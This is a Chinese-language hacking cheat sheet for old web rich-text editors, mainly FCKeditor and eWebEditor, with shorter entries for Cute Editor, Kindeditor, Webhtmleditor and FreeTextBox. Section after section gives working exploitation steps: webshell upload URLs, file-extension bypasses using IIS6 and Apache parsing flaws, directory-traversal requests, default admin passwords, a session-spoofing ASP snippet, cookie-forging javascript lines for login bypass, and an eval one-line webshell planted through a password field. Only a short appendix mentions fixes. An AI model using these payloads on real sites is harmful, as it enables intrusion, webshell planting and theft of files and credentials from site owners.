FCKeditor
FCKeditor編輯器頁/檢視編輯器版本/檢視檔案上傳路徑
FCKeditor編輯器頁
FCKeditor/_samples/default.html
檢視編輯器版本
FCKeditor/_whatsnew.html
檢視檔案上傳路徑
fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
XML頁面中第二行 “url=/xxx”的部分就是預設基準上傳路徑
Note:[Hell1]截至2010年02月15日最新版本為FCKeditor v2.6.6
[Hell2]記得修改其中兩處asp為FCKeditor實際使用的腳本語言
FCKeditor被動限制政策所導緻的過濾不嚴問題
影響版本: FCKeditor x.x <= FCKeditor v2.4.3
脆弱描述:
FCKeditor v2.4.3中File類别預設拒絕上傳類型:html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|
pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
Fckeditor 2.0 <= 2.2允許上傳asa、cer、php2、php4、inc、pwml、pht字尾的檔案
上傳後 它儲存的檔案直接用的$sFilePath = $sServerDir . $sFileName,而沒有使用$sExtension為字尾
直接導緻在win下在上傳檔案後面加個.來突破[未測試]
而在apache下,因為"Apache檔案名解析缺陷漏洞"也可以利用之,詳見"附錄A"
另建議其他上傳漏洞中定義TYPE變量時使用File類别來上傳檔案,根據FCKeditor的代碼,其限制最為狹隘。
攻擊利用:
允許其他任何字尾上傳
Note:[Hell1]原作:http://superhei.blogbus.com/logs/2006/02/1916091.html
利用2003路徑解析漏洞上傳網馬
影響版本: 附錄B
脆弱描述:
利用2003系統路徑解析漏洞的原理,建立類似“bin.asp”如此一般的目錄,再在此目錄中上傳檔案即可被腳本解釋器以相應腳本權限執行。
攻擊利用:
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
FCKeditor PHP上傳任意檔案漏洞
影響版本: FCKeditor 2.2 <= FCKeditor 2.4.2
脆弱描述:
FCKeditor在處理檔案上傳時存在輸入驗證錯誤,遠端攻擊可以利用此漏洞上傳任意檔案。
在通過editor/filemanager/upload/php/upload.php上傳檔案時攻擊者可以通過為Type參數定義無效的值導緻上傳任意腳本。
成功攻擊要求config.php配置檔案中啟用檔案上傳,而預設是禁用的。攻擊利用: (請修改action字段為指定網址):
FCKeditor 《=2.4.2 for php.html
Note:如想嘗試v2.2版漏洞,則修改Type=任意值 即可,但注意,如果換回使用Media則必須大寫首字母M,否則LINUX下,FCKeditor會對檔案目錄進行檔案名校驗,不會上傳成功的。
TYPE自定義變量任意上傳檔案漏洞
影響版本: 較早版本
脆弱描述:
通過自定義Type變量的參數,可以建立或上傳檔案到指定的目錄中去,且沒有上傳檔案格式的限制。
攻擊利用: /FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
打開這個位址就可以上傳任何類型的檔案了,Shell上傳到的預設位置是:
http://www.heimian.com/UserFiles/all/1.asp
"Type=all" 這個變量是自定義的,在這裡建立了all這個目錄,而且新的目錄沒有上傳檔案格式的限制.
比如輸入:
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp
網馬就可以傳到網站的根目錄下.
Note:如找不到預設上傳檔案夾可檢查此檔案: fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor 新聞討論區件周遊目錄漏洞
影響版本:aspx版FCKeditor,其餘版本未測試
脆弱描述:如何獲得webshell請參考上文“TYPE自定義變量任意上傳檔案漏洞”
攻擊利用:
修改CurrentFolder參數使用 ../../來進入不同的目錄
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp
根據傳回的XML資訊可以檢視網站所有的目錄。
/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
FCKeditor中webshell的其他上傳方式
影響版本:非優化/精簡版本的FCKeditor
脆弱描述:
如果存在以下檔案,打開後即可上傳檔案。
攻擊利用:
fckeditor/editor/filemanager/upload/test.html
fckeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor 檔案上傳“.”變“_”下劃線的繞過方法
影響版本: FCKeditor => 2.4.x
脆弱描述:
我們上傳的檔案例如:shell.php.rar或shell.php;.jpg會變為shell_php;.jpg這是新版FCK的變化。
攻擊利用:
送出1.php+空格 就可以繞過去所有的,
※不過空格隻支援win系統 *nix是不支援的[1.php和1.php+空格是2個不同的檔案]
Note:upload/2010/3/201003102334372778.jpg 這樣的格式做了過濾。也就是IIS6解析漏洞。
上傳第一次。被過濾為123_asp;123.jpg 進而無法運作。
但是第2次上傳同名檔案123.asp;123.jpg後。由于”123_asp;123.jpg”已經存在。
檔案名被命名為123.asp;123(1).jpg …… 123.asp;123(2).jpg這樣的編号方式。
是以。IIS6的漏洞繼續執行了。
如果通過上面的步驟進行測試沒有成功,可能有以下幾方面的原因:
1.FCKeditor沒有開啟檔案上傳功能,這項功能在安裝FCKeditor時預設是關閉的。如果想上傳檔案,FCKeditor會給出錯誤提示。
2.網站采用了精簡版的FCKeditor,精簡版的FCKeditor很多功能丢失,包括檔案上傳功能。
3.FCKeditor的這個漏洞已經被修複。
--------------------------------------------------------------------------------
eWebEditor
eWebEditor利用基礎知識
預設背景位址:/ewebeditor/admin_login.asp
建議最好檢測下admin_style.asp檔案是否可以直接通路
預設資料庫路徑:[PATH]/db/ewebeditor.mdb
[PATH]/db/db.mdb -- 某些CMS裡是這個資料庫
也可嘗試 [PATH]/db/%23ewebeditor.mdb -- 某些管理者自作聰明的小伎倆
使用預設密碼:admin/admin888 或 admin/admin 進入背景,也可嘗試 admin/123456 (有些管理者以及一些CMS,就是這麼設定的)
點選“樣式管理”--可以選擇新增樣式,或者修改一個非系統樣式,将其中圖檔控件所允許的上傳類型後面加上|asp、|asa、|aaspsp或|cer,隻要是伺服器允許執行的腳本類型即可,點選“送出”并設定工具欄--将“插入圖檔”控件添加上。而後--預覽此樣式,點選插入圖檔,上傳WEBSHELL,在“代碼”模式中檢視上傳檔案的路徑。
2、當資料庫被管理者修改為asp、asa字尾的時候,可以插一句話木馬服務端進入資料庫,然後一句話木馬用戶端連接配接拿下webshell
3、上傳後無法執行?目錄沒權限?帥鍋你回去樣式管理看你編輯過的那個樣式,裡面可以自定義上傳路徑的!!!
4、設定好了上傳類型,依然上傳不了麽?估計是檔案代碼被改了,可以嘗試設定“遠端類型”依照6.0版本拿SHELL的方法來做(詳情見下文↓),能夠設定自動儲存遠端檔案的類型。
5、不能添加工具欄,但設定好了某樣式中的檔案類型,怎麼辦?↓這麼辦!
(請修改action字段)
Action.html
eWebEditor踩腳印式入侵
脆弱描述:
當我們下載下傳資料庫後查詢不到密碼MD5的明文時,可以去看看webeditor_style(14)這個樣式表,看看是否有前輩入侵過 或許已經賦予了某控件上傳腳本的能力,構造位址來上傳我們自己的WEBSHELL.
攻擊利用:
比如 ID=46 s-name =standard1
構造 代碼: ewebeditor.asp?id=content&style=standard
ID和和樣式名改過後
ewebeditor.asp?id=46&style=standard1
eWebEditor周遊目錄漏洞
脆弱描述:
ewebeditor/admin_uploadfile.asp
admin/upload.asp
過濾不嚴,造成周遊目錄漏洞
攻擊利用:
第一種:ewebeditor/admin_uploadfile.asp?id=14
在id=14後面添加&dir=..
再加 &dir=../..
&dir=http://www.heimian.com/../.. 看到整個網站檔案了
第二種: ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =./..
eWebEditor 5.2 列目錄漏洞
脆弱描述:
ewebeditor/asp/browse.asp
過濾不嚴,造成周遊目錄漏洞
攻擊利用:
http://www.heimian.com/ewebeditor/asp/browse.asp?style=standard650&dir=…././/..
利用WebEditor session欺騙漏洞,進入背景
脆弱描述:
漏洞檔案:Admin_Private.asp
隻判斷了session,沒有判斷cookies和路徑的驗證問題。
攻擊利用:
建立一個test.asp内容如下:
<%Session("eWebEditor_User") = "11111111"%>
通路test.asp,再通路背景任何檔案,for example:Admin_Default.asp
eWebEditor asp版 2.1.6 上傳漏洞
攻擊利用:(請修改action字段為指定網址)
ewebeditor asp版2.1.6上傳漏洞利用程式.html
eWebEditor 2.7.0 注入漏洞
攻擊利用:
http://www.heimian.com/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200
預設表名:eWebEditor_System預設列名:sys_UserName、sys_UserPass,然後利用nbsi進行猜解.
eWebEditor2.8.0最終版删除任意檔案漏洞
脆弱描述:
此漏洞存在于Example/NewsSystem目錄下的delete.asp檔案中,這是ewebeditor的測試頁面,無須登陸可以直接進入。
攻擊利用: (請修改action字段為指定網址)
Del Files.html
eWebEditor v6.0.0 上傳漏洞
攻擊利用:
在編輯器中點選“插入圖檔”--網絡--輸入你的WEBSHELL在某空間上的位址(注:檔案名稱必須為:xxx.jpg.asp 以此類推…),确定後,點選“遠端檔案自動上傳”控件(第一次上傳會提示你安裝控件,稍等即可),檢視“代碼”模式找到檔案上傳路徑,通路即可,eweb官方的DEMO也可以這麼做,不過對上傳目錄取消掉了執行權限,是以上傳上去也無法執行網馬.
eWebEditor PHP/ASP…背景通殺漏洞
影響版本: PHP ≥ 3.0~3.8與asp 2.8版也通用,或許低版本也可以,有待測試。
攻擊利用:
進入背景/eWebEditor/admin/login.php,随便輸入一個使用者和密碼,會提示出錯了.
這時候你清空浏覽器的url,然後輸入
javascript:alert(document.cookie="adminuser="+escape("admin"));
javascript:alert(document.cookie="adminpass="+escape("admin"));
javascript:alert(document.cookie="admindj="+escape("1"));
而後三次回車,清空浏覽器的URL,現在輸入一些平常通路不到的檔案如../ewebeditor/admin/default.php,就會直接進去。
eWebEditor for php任意檔案上傳漏洞
影響版本:ewebeditor php v3.8 or older version
脆弱描述:
此版本将所有的風格配置資訊儲存為一個數組$aStyle,在php.ini配置register_global為on的情況下我們可以任意添加自己喜歡的風格,并定義上傳類型。
攻擊利用:
phpupload.html
eWebEditor JSP版漏洞
大同小異,我在本文檔不想多說了,因為沒環境 測試,網上垃圾場那麼大,不好排查。用JSP編輯器的我覺得eweb會比FCKeditor份額少得多。
給出個連接配接:http://blog.haaker.cn/post/161.html
還有:http://www.anqn.com/zhuru/article/all/2008-12-04/a09104236.shtml
eWebEditor 2.8 商業版插一句話木馬
影響版本:=>2.8 商業版
攻擊利用:
登陸背景,點選修改密碼---新密碼設定為 1":eval request("h")’
設定成功後,通路asp/config.asp檔案即可,一句話木馬被寫入到這個檔案裡面了.
eWebEditorNet upload.aspx 上傳漏洞(WebEditorNet)
脆弱描述:
WebEditorNet 主要是一個upload.aspx檔案存在上傳漏洞。
攻擊利用:
預設上傳位址:/ewebeditornet/upload.aspx
可以直接上傳一個cer的木馬
如果不能上傳則在浏覽器位址欄中輸入javascript:lbtnUpload.click();
成功以後檢視源代碼找到uploadsave檢視上傳儲存位址,預設傳到uploadfile這個檔案夾裡。
southidceditor(一般使用v2.8.0版eWeb核心)
idceditor/datas/southidceditor.mdb">http://www.heimian.com/admin/southidceditor/datas/southidceditor.mdb
http://www.heimian.com/admin/southidceditor/admin/admin_login.asp
http://www.heimian.com/admin/southidceditor/popup.asp
bigcneditor(eWeb 2.7.5 VIP核心)
其實所謂的Bigcneditor就是eWebEditor 2.7.5的VIP使用者版.之是以無法通路admin_login.asp,提示“權限不夠”4字真言,估計就是因為其授權“Licensed”問題,或許隻允許被授權的機器通路背景才對。
或許上面針對eWebEditor v2.8以下低版本的小動作可以用到這上面來.貌似沒多少動作?
--------------------------------------------------------------------------------
Cute Editor
Cute Editor線上編輯器本地包含漏洞
影響版本:
CuteEditor For Net 6.4
脆弱描述:
可以随意檢視網站檔案内容,危害較大。
攻擊利用:
http://www.heimian.com/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config
--------------------------------------------------------------------------------
Webhtmleditor
利用WIN 2003 IIS檔案名稱解析漏洞獲得SHELL
影響版本:<= Webhtmleditor最終版1.7 (已停止更新)
脆弱描述/攻擊利用:
對上傳的圖檔或其他檔案無重命名操作,導緻允許惡意使用者上傳diy.asp;.jpg來繞過對字尾名審查的限制,對于此類因編輯器作者意識犯下的錯誤,就算遭遇縮略圖,檔案頭檢測,也可使用圖檔木馬 插入一句話來突破。
--------------------------------------------------------------------------------
Kindeditor
利用WIN 2003 IIS檔案名稱解析漏洞獲得SHELL
影響版本: <= kindeditor 3.2.1(09年8月份釋出的最新版)
脆弱描述/攻擊利用:
拿官方做個示範:進入upload/2010/3/201003102334381513.jpg 大家可以前去圍觀。
Note:參見附錄C原了解析。
--------------------------------------------------------------------------------
Freetextbox
Freetextbox周遊目錄漏洞
影響版本:未知
脆弱描述:
因為ftb.imagegallery.aspx代碼中 隻過濾了/但是沒有過濾/符号是以導緻出現了周遊目錄的問題。
攻擊利用:
在編輯器頁面點圖檔會彈出一個框(抓包得到此位址)構造如下,可周遊目錄。
http://www.heimian.com/Member/images/ftb/HelperScripts/ftb.imagegallery.aspx?frame=1&rif=..&cif=/..
--------------------------------------------------------------------------------
附錄A:
Apache檔案名解析缺陷漏洞:
測試環境:apache 2.0.53 winxp,apache 2.0.52 redhat linux
1.國外(SSR TEAM)發了多個advisory稱Apache's MIME module (mod_mime)相關漏洞,就是attack.php.rar會被當做php檔案執行的漏洞,包括Discuz!那個p11.php.php.php.php.php.php.php.php.php.php.php.php.rar漏洞。
2.S4T的superhei在blog上釋出了這個apache的小特性,即apache 是從後面開始檢查字尾,按最後一個合法字尾執行。其實隻要看一下apache的htdocs那些預設安裝的index.XX檔案就明白了。
3.superhei已經說的非常清楚了,可以充分利用在上傳漏洞上,我按照普遍允許上傳的檔案格式測試了一下,列舉如下(亂分類勿怪)
典型型:rar
備份型:bak,lock
流媒體型:wma,wmv,asx,as,mp4,rmvb
微軟型:sql,chm,hlp,shtml,asp
任意型:test,fake,ph4nt0m
特殊型:torrent
程式型:jsp,c,cpp,pl,cgi
4.整個漏洞的關鍵就是apache的"合法字尾"到底是哪些,不是"合法字尾"的都可以被利用。
5.測試環境
a.php
<? phpinfo();?>
然後增加任意字尾測試,a.php.aaa,a.php.aab....
By cloie, in ph4nt0m.net(c) Security.
附錄B:
安裝了iis6的伺服器(windows2003),受影響的檔案名字尾有.asp .asa .cdx .cer .pl .php .cgi
Windows 2003 Enterprise Edition是微軟目前主流的伺服器作業系統。 Windows 2003 IIS6 存在着檔案解析路徑的漏洞,當檔案夾名為類似hack.asp的時候(即檔案夾名看起來像一個ASP檔案的檔案名),此時此檔案夾下的任何類型的檔案(比如.gif,.jpg,.txt等)都可以在IIS中被當做ASP程式來執行。這樣黑客即可上傳擴充名為jpg或gif之類的看起來像是圖檔檔案的木馬檔案,通過通路這個檔案即可運作木馬。如果這些網站中有任何一個檔案夾的名字是以 .asp .php .cer .asa .cgi .pl 等結尾,那麼放在這些檔案夾下面的任何類型的檔案都有可能被認為是腳本檔案而交給腳本解析器而執行。
附錄C:
漏洞描述:
當檔案名為[YYY].asp;[ZZZ].jpg時,Microsoft IIS會自動以asp格式來進行解析。
而當檔案名為[YYY].php;[ZZZ].jpg時,Microsoft IIS會自動以php格式來進行解析。
其中[YYY]與[ZZZ]處為可變化字元串。
影響平台:
Windows Server 2000 / 2003 / 2003 R2 (IIS 5.x / 6.0)
修補方法:
1、等待微軟相關的更新檔包
2、關閉圖檔所在目錄的腳本執行權限(前提是你的某些圖檔沒有與程式混合存放)
3、校驗網站程式中所有上傳圖檔的代碼段,對形如[YYY].asp;[ZZZ].jpg的圖檔做攔截
備注:
對于Windows Server 2008(IIS7)以及Windows Server 2008 R2(IIS7.5) 則未受影響.
![JavaScript的那些坑之事件代理事件代理事件階段[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)